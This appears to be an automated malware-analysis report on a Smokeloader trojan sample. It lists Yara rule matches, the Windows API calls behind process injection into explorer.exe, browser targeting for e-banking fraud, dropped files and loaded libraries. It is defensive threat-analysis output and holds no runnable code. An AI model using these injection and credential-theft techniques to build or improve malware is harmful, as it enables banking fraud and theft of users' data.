                      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
                      Source: Yara match | File source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
                      Source: Yara match | File source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED

                      E-Banking Fraud

                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03222EA8 StrStrIA, chrome.exe|opera.exe|msedge.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe

                      System Summary

                      Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_00402600 NtOpenKey,NtEnumerateKey,NtEnumerateKey,NtClose
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_00402FFC RtlCreateUserThread,NtTerminateProcess
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_00401597 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_0040250F NtOpenKey,NtEnumerateKey,NtEnumerateKey
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015C6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015C9 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004032DC NtTerminateProcess,RtlInitUnicodeString,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004022DE NtQuerySystemInformation
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_00402595 NtOpenKey,NtEnumerateKey,NtEnumerateKey
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015A2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004022A8 NtQuerySystemInformation
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015AE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004023B0 NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,NtEnumerateKey
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015B2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004015B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E4B92 RtlMoveMemory,NtUnmapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E33C3 NtQueryInformationFile
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E342B NtQueryObject,NtQueryObject,RtlMoveMemory
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle
                      Source: C:\Windows\explorer.exe | Code function: 8_2_00A338B0 NtUnmapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03222E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03221FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03221F4E NtCreateSection,NtMapViewOfSection
                      Source: C:\Windows\explorer.exe | Code function: 10_2_00D95300 NtUnmapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_03001016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_03001A80 NtCreateSection,NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_03001819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                      Source: C:\Windows\explorer.exe | Code function: 12_2_0080355C NtUnmapViewOfSection
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C1F82 RtlMoveMemory,NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004032DC
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E2198
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007EC2F9
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007FB35C
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00834438
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007FB97E
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E6E6A
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00805F08
                      Source: C:\Windows\explorer.exe | Code function: 8_2_00A31E20
                      Source: C:\Windows\explorer.exe | Code function: 10_2_00D92C00
                      Source: C:\Windows\explorer.exe | Code function: 12_2_00802054
                      Source: C:\Windows\explorer.exe | Code function: 12_2_00802860
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030CEA1C
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030CFAB4
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C3DE2
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C4445
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030CC452
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C80F6
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 007E7F70 appears 32 times
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 030C8F30 appears 32 times
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 007E8801 appears 40 times
                      Source: WalletService.dll.mui.13.dr | Static PE information: No import functions for PE file found
                      Source: hfetwhc.2.dr | Static PE information: No import functions for PE file found
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: No import functions for PE file found
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.dr | Static PE information: Section .text
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: Section .text
                      Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@17/55@3/2
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223BE1 wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E4440 CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\hfetwhc
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BD1F.tmp
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C96A.tmp.7.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | ReversingLabs: Detection: 47%
                      Source: unknown | Process created: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe "C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\hfetwhc C:\Users\user\AppData\Roaming\hfetwhc
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\hfetwhc C:\Users\user\AppData\Roaming\hfetwhc
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
                      Source: C:\Windows\explorer.exe | Section loaded: webio.dll
                      Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
                      Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
                      Source: C:\Windows\explorer.exe | Section loaded: provsvc.dll
                      Source: C:\Users\user\AppData\Roaming\hfetwhc | Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
